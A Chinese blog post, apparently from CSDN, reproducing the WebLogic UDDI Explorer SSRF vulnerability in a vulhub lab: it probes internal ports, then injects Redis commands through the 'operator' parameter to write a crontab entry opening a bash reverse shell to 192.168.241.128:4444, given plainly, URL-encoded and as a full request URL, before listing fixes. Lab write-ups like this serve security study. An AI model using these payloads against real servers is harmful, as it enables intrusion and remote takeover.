Weblogic SSRF漏洞复现

最新推荐文章于 2024-03-09 00:12:24 发布
最新推荐文章于 2024-03-09 00:12:24 发布
阅读量1.1k 收藏 4
点赞数
分类专栏: 漏洞复现 weblogic 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huangyongkang666/article/details/125936125
版权

Weblogic SSRF漏洞复现

1.漏洞原理

Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。

影响版本

weblogic 10.0.2 – 10.3.6版本

2.环境搭建

在vulhub靶场启动docker-compose up -d

访问http://your-ip:7001/uddiexplorer/,无需登录即可查看uddiexplorer应用。

在这里插入图片描述

3.漏洞测试

SSRF漏洞存在于http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp,我们在brupsuite下测试该漏洞。访问一个可以访问的IP:PORT,如http://127.0.0.1:80

可访问的端口将会得到错误,一般是返回status code,如果访问的非http协议,则会返回did not have a valid SOAP content-type。修改为一个不存在的端口,将会返回could not connect over HTTP to server

ssrf漏洞存在的情况,这一种比较普遍,就是传入url,并且服务器端验证没有对用户做出严格的过滤。

在这里插入图片描述

就是这里可以进行端口探测,这里的参数operator我们是可控的,当我们输入不同值时可得到多种不同的报错,端口存在返回状态码returned a 404 error code

在这里插入图片描述

docker ps 查看容器ID
docker exec -it a55d0d99fd18 /bin/bash 进入容器Redis,查看ip

在这里插入图片描述

探测redis容器是否开启6379端口

在这里插入图片描述

输入错误会报错

输入正确会返回null

可以发现6379端口开启。

4.注入HTTP头,利用Redis反弹shell

发送三条redis命令,将弹shell脚本写入/etc/crontab:利用Redis定时任务反弹shell

test 
 
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.241.128/4444 0>&1\n\n\n\n"
 
config set dir /etc/
 
config set dbfilename crontab save 
 
aaa

将这三条命令进行URL编码

%74%65%73%74%0a%0a%73%65%74%20%31%20%22%5c%6e%5c%6e%5c%6e%5c%6e%2a%20%2a%20%2a%20%2a%20%2a%20%72%6f%6f%74%20%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%32%34%31%2e%31%32%38%2f%34%34%34%34%20%30%3e%26%31%5c%6e%5c%6e%5c%6e%5c%6e%22%0a%63%6f%6e%66%69%67%20%73%65%74%20%64%69%72%20%2f%65%74%63%2f%0a%63%6f%6e%66%69%67%20%73%65%74%20%64%62%66%69%6c%65%6e%61%6d%65%20%63%72%6f%6e%74%61%62%0a%73%61%76%65%0a%0a%61%61%61

注意,换行符是“\r\n”,也就是“%0D%0A”。

将url编码后的字符串放在ssrf的域名后面,发送:

在这里插入图片描述

放包后:
在这里插入图片描述

但是上面这种没有反弹shell,于是用了下面的pyload

http://192.168.42.145:7001//uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.25.0.2:6379/test%0D%0A%0D%0Aset%201%20%22\n\n\n\n*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.241.128%2F4444%200%3E%261\n\n\n\n%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aqwezxc

在这里插入图片描述

进入容器,使用命令

cat /etc/crontab  //查看定时任务

在这里插入图片描述

这种get方式请求才反弹shell,猜测请求方式的不同导致的结果不同

在这里插入图片描述

5.修复方案

1.:利用weblogic补丁修复

2.:删除uudi相关部署包,由于每个server的tmp目录下都有缓存,所以删除后要彻底重启weblogic(即停应用–停server–停控制台–启控制台–启server–启应用)

makven60
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
weblogicssrf漏洞修复_Weblogic SSRF漏洞
weixin_35860326的博客
12-09 617
一、漏洞概述: Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。二、漏洞环境搭建: 1、使用docker+vulhub安装(菜没有办法)2、查看是否安装成功(注意需要访问的是7001端口)成功安装三、漏洞验证 1、验证漏洞是否存在,点击Search P...
中间件漏洞 | weblogic-ssrf
weixin_52116519的博客
10-22 795
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,探测内网IP及端口的开放情况,进而攻击内网中redis、fastcgi等脆弱组件。漏洞版本:weblogic 10.0.2-10.3.6。
weblogic相关漏洞
05-03
weblogic相关漏洞
SSRF漏洞原理及其修复方式和加固方式
最新发布
网络战争的博客
03-09 562
1. 输入验证和过滤:服务器端应用程序需要对从用户输入中获取的URL进行充分验证和过滤,确保只接受合法的URL。总之,修复和加固SSRF漏洞需要综合使用输入验证、过滤、限制协议和端口、内网访问限制等技术手段,并采取更新组件、强制访问控制、安全审计和监控等措施来提高应用程序的安全性。SSRF漏洞的原理是,服务器端应用程序未对从用户输入中获取的URL进行充分验证和过滤,导致攻击者可以构造恶意的URL,使服务器端应用程序发送请求到攻击者指定的目标。可以使用白名单机制,只允许特定的协议和端口。
雷石weblogic漏洞扫描工具
08-27
雷石weblogic漏洞扫描工具
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
WebLogic SSRF And XSS检查利用工具.exe
08-11
非常简单方便/实用的WebLogic SSRF And XSS检查利用工具
漏洞复现Weblogic SSRF漏洞复现
Miraitowax
02-22 856
Weblogic SSRF的漏洞原理,漏洞复现步骤详细总结及剖析
weblogicssrf漏洞修复_Weblogic-SSRF漏洞复现
weixin_39922361的博客
12-22 371
一、环境靶机:centos7虚拟机 ip:192.168.8.11物理机:windows10burp suite二、原理SSRF原理:是指Web服务提供从用户指定的URL读取数据并展示功能又未对用户输入的URL进行过滤,导致攻击者可借助服务端实现访问其本无权访问的URL。攻击者无权访问的URL主要是内网,而对于不是Web服务的其他端口反回的一般是端口对应的服务的banner信息,所...
SSRC】Weblogic SSRF漏洞
wj33333的博客
11-17 258
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。来注入换行符,而某些服务(如redis)是通过换行符来分隔每条命令,也就说我们可以通过该SSRF攻击内网中的redis服务器。WeblogicSSRF有一个比较大的特点,其虽然是一个“GET”请求,但是我们可以通过传入。首先,通过ssrf探测内网中的redis服务器(docker环境的网段一般是172.*),可访问的端口将会得到错误,一般是返回status code(如下图)。
关于Weblogic SSRF漏洞复现
mw_myever的博客
10-19 340
一、漏洞介绍  Weblogic中的这个环境就有点类似这个样子的,就是由于访问目标网站是的参数是url 这时就有可能存在ssrf漏洞,恰好在服务端验证请求时没有对用户请求做出严格的过滤以及限制,导致其可以获取服务器的一定量的数据,并可以实现篡改获取的资源并请求发送给服务器,这里就是篡改了 /etc/crontab下的信息,将反弹shell脚本写入了该目录下,是通过获取服务器的redis服务,通过6379 这个端口实现的。 redis数据库 1、未授权访问在访问redis数据库的时候,不需要提供用户名和密码
Weblogic SSRF漏洞
chaojixiaojingang
01-14 1万+
1.漏洞描述 weblogic中存在SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。 2.影响版本 weblogic 10.0.2 – 10.3.6版本 3.POC http://192.168.42.145:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSear...
Weblogic-SSRF漏洞复现
wodepzw的博客
12-11 460
SSRF漏洞存在于http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp 我们在brupsuite下测试该漏洞。访问一个可以访问的IP:PORT,如http://127.0.0.1:7001 我们访问的IP是内网ip地址,一般是拒绝访问的 当我们访问一个不存在的端口时,比如 http://127.0.0.1:7000 将会返回:co...
网络安全——实操weblogicssrf漏洞
Demo不是emo的博客
09-18 2451
今天我们讲的还是ssrf漏洞的利用,选择的环境是weblogicssrf历史漏洞,需要用到vulhub靶场和docker环境,都给大家准备好了,需要的自取自用,这服务不得打满分啊?
AppScan安全漏洞报告
收集盒 Book box
01-06 1391
1.会话cookie 中缺少HttpOnly 属性。   修复任务: 向所有会话cookie 添加“HttpOnly”属性    解决方案,过滤器中,  Java代码   HttpServletResponse response2 = (HttpServletResponse)response;   //httponly是微软对cookie做的扩展,该值指定 Cook
第48篇:Weblogic最新漏洞修复方法(禁用T3+IIOP协议)
热门推荐
ABC_123的博客
01-27 12万+
Part1 前言大家好,我是ABC_123。春节前weblogic爆出了一个新的漏洞CVE-2023-21839,据说有攻击队曾用这个在野0day打穿了某银行目标。通过官方的漏洞描述来看,应该还是借助jndi来实现反序列化漏洞利用,所以此漏洞成功条件是目标一定要出网,而且T3或IIOP协议开放。与T3协议或IIOP协议相关的weblogic的0day漏洞近几年还会不断地公布出来,要想彻底解决这...
vulhub weblogic ssrf漏洞
03-16
vulhub weblogic ssrf漏洞是指在WebLogic服务器中存在一种安全漏洞,攻击者可以利用该漏洞来发起服务器端请求伪造(SSRF)攻击。攻击者可以利用该漏洞来访问受保护的内部网络资源,或者利用该漏洞来发起其他攻击,例如攻击内部应用程序或数据。为了防止此类漏洞的利用,建议管理员及时更新WebLogic服务器的补丁程序,并加强网络安全防护措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值